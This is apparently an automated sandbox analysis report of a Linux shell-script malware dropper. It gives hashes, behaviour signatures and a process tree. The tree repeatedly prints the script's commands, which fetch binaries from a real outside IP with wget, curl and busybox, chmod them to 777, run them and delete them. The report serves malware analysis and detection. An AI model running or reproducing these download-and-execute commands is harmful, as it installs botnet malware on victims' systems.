Analysis
-
max time kernel
20s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
01-11-2024 02:32
Static task
static1
Behavioral task
behavioral1
Sample
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
-
Size
10KB
-
MD5
0e701247eed8c2ac85ce4310d37e674d
-
SHA1
7ca0caf639c6d80baffe549e24e3018daaa8bbb8
-
SHA256
27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb
-
SHA512
0ef0aa05143b180e5260a49f2e87ebca0ecec3ab767bbbc7bc0761a2244b20b000aaffead5bd57071f0022821063d4c4ae9bb2efac893131009c19b2f57f556b
-
SSDEEP
96:PBRELvNSsmyUgEmy+bytMKk99ch83tkBRELvFSsQZFWyLJBmy+bytMs799chtE37:Y1myUgE5CVS3n
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1648 chmod 1522 chmod 1564 chmod 1576 chmod 1552 chmod 1642 chmod 1570 chmod 1558 chmod 1588 chmod 1612 chmod 1678 chmod 1528 chmod 1606 chmod 1624 chmod 1630 chmod 1636 chmod 1600 chmod 1534 chmod 1540 chmod 1672 chmod 1516 chmod 1582 chmod 1594 chmod 1618 chmod 1654 chmod 1660 chmod 1666 chmod 1546 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m 1517 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s 1523 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 1529 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys 1535 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh 1541 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 1547 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK 1553 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do 1559 oieViux5SkcOflukQEESWqzwe8qoXmU0do /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT 1565 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq 1571 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH 1577 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb 1583 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV 1589 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA 1595 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m 1601 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s 1607 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 1613 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 1619 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK 1625 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do 1631 oieViux5SkcOflukQEESWqzwe8qoXmU0do /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys 1637 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh 1643 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT 1649 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb 1655 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV 1661 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA 1667 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq 1673 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH 1679 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT curl File opened for modification /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA curl File opened for modification /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 curl File opened for modification /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys curl File opened for modification /tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT curl File opened for modification /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m curl File opened for modification /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb curl File opened for modification /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH curl File opened for modification /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do curl File opened for modification /tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m curl File opened for modification /tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb curl File opened for modification /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV curl File opened for modification /tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV curl File opened for modification /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh curl File opened for modification /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 curl File opened for modification /tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do curl File opened for modification /tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4 curl File opened for modification /tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA curl File opened for modification /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK curl File opened for modification /tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK curl File opened for modification /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq curl File opened for modification /tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq curl File opened for modification /tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7 curl File opened for modification /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s curl File opened for modification /tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys curl File opened for modification /tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh curl File opened for modification /tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH curl File opened for modification /tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s curl
Processes
-
/tmp/27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh/tmp/27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh1⤵PID:1507
-
/bin/rm/bin/rm bins.sh2⤵PID:1508
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:1509
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Writes file to tmp directory
PID:1514
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:1515
-
-
/bin/chmodchmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- File and Directory Permissions Modification
PID:1516
-
-
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Executes dropped EXE
PID:1517
-
-
/bin/rmrm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:1518
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:1519
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:1521
-
-
/bin/chmodchmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- File and Directory Permissions Modification
PID:1522
-
-
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Executes dropped EXE
PID:1523
-
-
/bin/rmrm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:1524
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:1525
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Writes file to tmp directory
PID:1526
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:1527
-
-
/bin/chmodchmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- File and Directory Permissions Modification
PID:1528
-
-
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Executes dropped EXE
PID:1529
-
-
/bin/rmrm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:1530
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:1531
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Writes file to tmp directory
PID:1532
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:1533
-
-
/bin/chmodchmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- File and Directory Permissions Modification
PID:1534
-
-
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Executes dropped EXE
PID:1535
-
-
/bin/rmrm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:1536
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:1537
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Writes file to tmp directory
PID:1538
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:1539
-
-
/bin/chmodchmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Executes dropped EXE
PID:1541
-
-
/bin/rmrm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:1542
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:1543
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Writes file to tmp directory
PID:1544
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:1545
-
-
/bin/chmodchmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- File and Directory Permissions Modification
PID:1546
-
-
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Executes dropped EXE
PID:1547
-
-
/bin/rmrm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:1548
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:1549
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Writes file to tmp directory
PID:1550
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:1551
-
-
/bin/chmodchmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- File and Directory Permissions Modification
PID:1552
-
-
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Executes dropped EXE
PID:1553
-
-
/bin/rmrm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:1554
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:1555
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:1557
-
-
/bin/chmodchmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- File and Directory Permissions Modification
PID:1558
-
-
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do./oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Executes dropped EXE
PID:1559
-
-
/bin/rmrm oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:1560
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:1561
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Writes file to tmp directory
PID:1562
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:1563
-
-
/bin/chmodchmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Executes dropped EXE
PID:1565
-
-
/bin/rmrm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:1566
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:1567
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Writes file to tmp directory
PID:1568
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:1569
-
-
/bin/chmodchmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- File and Directory Permissions Modification
PID:1570
-
-
/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵
- Executes dropped EXE
PID:1571
-
-
/bin/rmrm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq2⤵PID:1572
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:1573
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Writes file to tmp directory
PID:1574
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:1575
-
-
/bin/chmodchmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- File and Directory Permissions Modification
PID:1576
-
-
/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵
- Executes dropped EXE
PID:1577
-
-
/bin/rmrm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH2⤵PID:1578
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:1579
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:1581
-
-
/bin/chmodchmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵
- Executes dropped EXE
PID:1583
-
-
/bin/rmrm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb2⤵PID:1584
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:1585
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Writes file to tmp directory
PID:1586
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:1587
-
-
/bin/chmodchmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- File and Directory Permissions Modification
PID:1588
-
-
/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵
- Executes dropped EXE
PID:1589
-
-
/bin/rmrm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV2⤵PID:1590
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:1591
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Writes file to tmp directory
PID:1592
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:1593
-
-
/bin/chmodchmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- File and Directory Permissions Modification
PID:1594
-
-
/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵
- Executes dropped EXE
PID:1595
-
-
/bin/rmrm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA2⤵PID:1596
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:1597
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Writes file to tmp directory
PID:1598
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:1599
-
-
/bin/chmodchmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- File and Directory Permissions Modification
PID:1600
-
-
/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵
- Executes dropped EXE
PID:1601
-
-
/bin/rmrm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m2⤵PID:1602
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:1603
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Writes file to tmp directory
PID:1604
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:1605
-
-
/bin/chmodchmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- File and Directory Permissions Modification
PID:1606
-
-
/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵
- Executes dropped EXE
PID:1607
-
-
/bin/rmrm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s2⤵PID:1608
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:1609
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Writes file to tmp directory
PID:1610
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:1611
-
-
/bin/chmodchmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- File and Directory Permissions Modification
PID:1612
-
-
/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵
- Executes dropped EXE
PID:1613
-
-
/bin/rmrm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk42⤵PID:1614
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:1615
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Writes file to tmp directory
PID:1616
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:1617
-
-
/bin/chmodchmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- File and Directory Permissions Modification
PID:1618
-
-
/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵
- Executes dropped EXE
PID:1619
-
-
/bin/rmrm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO72⤵PID:1620
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:1621
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Writes file to tmp directory
PID:1622
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:1623
-
-
/bin/chmodchmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- File and Directory Permissions Modification
PID:1624
-
-
/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵
- Executes dropped EXE
PID:1625
-
-
/bin/rmrm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK2⤵PID:1626
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:1627
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Writes file to tmp directory
PID:1628
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:1629
-
-
/bin/chmodchmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- File and Directory Permissions Modification
PID:1630
-
-
/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do./oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵
- Executes dropped EXE
PID:1631
-
-
/bin/rmrm oieViux5SkcOflukQEESWqzwe8qoXmU0do2⤵PID:1632
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:1633
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Writes file to tmp directory
PID:1634
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:1635
-
-
/bin/chmodchmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- File and Directory Permissions Modification
PID:1636
-
-
/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵
- Executes dropped EXE
PID:1637
-
-
/bin/rmrm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys2⤵PID:1638
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:1639
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Writes file to tmp directory
PID:1640
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:1641
-
-
/bin/chmodchmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- File and Directory Permissions Modification
PID:1642
-
-
/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵
- Executes dropped EXE
PID:1643
-
-
/bin/rmrm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh2⤵PID:1644
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:1645
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵
- Writes file to tmp directory
PID:1646
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT2⤵PID:1647
-
-
